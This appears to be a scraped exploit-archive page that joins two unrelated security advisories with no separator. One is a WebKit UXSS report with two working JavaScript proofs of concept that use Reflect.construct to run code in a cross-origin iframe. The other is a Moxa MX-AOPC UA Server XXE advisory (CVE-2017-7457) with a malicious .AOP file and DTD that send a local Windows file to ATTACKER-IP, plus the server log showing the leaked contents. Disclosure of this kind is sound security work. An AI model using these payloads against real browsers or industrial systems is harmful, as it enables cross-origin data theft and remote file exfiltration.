Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1084
When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|.
Here's some snippets of that routine.
Structure* InternalFunction::createSubclassStructure(ExecState* exec, JSValue newTarget, Structure* baseClass)
{
...
if (newTarget && newTarget != exec->jsCallee()) {
// newTarget may be an InternalFunction if we were called from Reflect.construct.
JSFunction* targetFunction = jsDynamicCast<JSFunction*>(newTarget);
if (LIKELY(targetFunction)) {
...
return targetFunction->rareData(vm)->createInternalFunctionAllocationStructureFromBase(vm, prototype, baseClass);
...
} else {
...
return vm.prototypeMap.emptyStructureForPrototypeFromBaseStructure(prototype, baseClass);
...
}
}
return baseClass;
}
inline Structure* PrototypeMap::createEmptyStructure(JSObject* prototype, const TypeInfo& typeInfo, const ClassInfo* classInfo, IndexingType indexingType, unsigned inlineCapacity)
{
...
Structure* structure = Structure::create(
prototype->globalObject()->vm(), prototype->globalObject(), prototype, typeInfo, classInfo, indexingType, inlineCapacity);
m_structures.set(key, Weak<Structure>(structure));
...
}
As we can see |Structure::create| is called with prototype's |vm| and |globalObject| as arguments. So it could lead to an UXSS condition.
Tested on Safari 10.0.2(12602.3.12.0.1) and Webkit Nightly 10.0.2(12602.3.12.0.1, r210800).
More simple way:
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;
let g = function () {};
g.prototype = f.contentWindow;
let a = Reflect.construct(Function, ['return window[0].eval;'], g);
let e = a();
e('alert(location)');
};
f.src = 'https://abc.xyz/';
-->
<body>
<script>
/*
When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|.
Here's some snippets of that routine.
Structure* InternalFunction::createSubclassStructure(ExecState* exec, JSValue newTarget, Structure* baseClass)
{
...
if (newTarget && newTarget != exec->jsCallee()) {
// newTarget may be an InternalFunction if we were called from Reflect.construct.
JSFunction* targetFunction = jsDynamicCast<JSFunction*>(newTarget);
if (LIKELY(targetFunction)) {
...
return targetFunction->rareData(vm)->createInternalFunctionAllocationStructureFromBase(vm, prototype, baseClass);
...
} else {
...
return vm.prototypeMap.emptyStructureForPrototypeFromBaseStructure(prototype, baseClass);
...
}
}
return baseClass;
}
inline Structure* PrototypeMap::createEmptyStructure(JSObject* prototype, const TypeInfo& typeInfo, const ClassInfo* classInfo, IndexingType indexingType, unsigned inlineCapacity)
{
...
Structure* structure = Structure::create(
prototype->globalObject()->vm(), prototype->globalObject(), prototype, typeInfo, classInfo, indexingType, inlineCapacity);
m_structures.set(key, Weak<Structure>(structure));
...
}
As we can see |Structure::create| is called with prototype's |vm| and |globalObject| as arguments. So it could lead to an UXSS condition.
Tested on Safari 10.0.2(12602.3.12.0.1) and Webkit Nightly 10.0.2(12602.3.12.0.1, r210800).
*/
'use strict';
function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;
let g = function () {};
g.prototype = f.contentWindow;
let a = Reflect.construct(Intl.NumberFormat, [], g);
Intl.NumberFormat.prototype.__lookupGetter__("format").call(a).constructor('alert(location)')();
};
f.src = 'https://abc.xyz/';
}
main();
</script>
</body>
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
============
www.moxa.com
Product:
=======================
MX-AOPC UA SERVER - 1.5
Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation supporting both push and pull communication.
Vulnerability Type:
==============================
XML External Entity Injection
CVE Reference:
==============
CVE-2017-7457
Security Issue:
================
XML External Entity via ".AOP" files used by MX-AOPC Server result in remote file disclosure. If local user opens
a specially crafted malicious MX-AOPC Server file type.
Exploit/POC:
=============
run MX-AOPC UA Server / Runtime / Start Server Runtime Service
a) ATTACKER SERVER LISTENER we will access Windows msfmap.ini as proof of concept
python -m SimpleHTTPServer 8080
"Evil.AOP" file
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
b) Evil "payload.dtd" file host on ATTACKER SERVER
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
%all;
e.g.
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 -
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx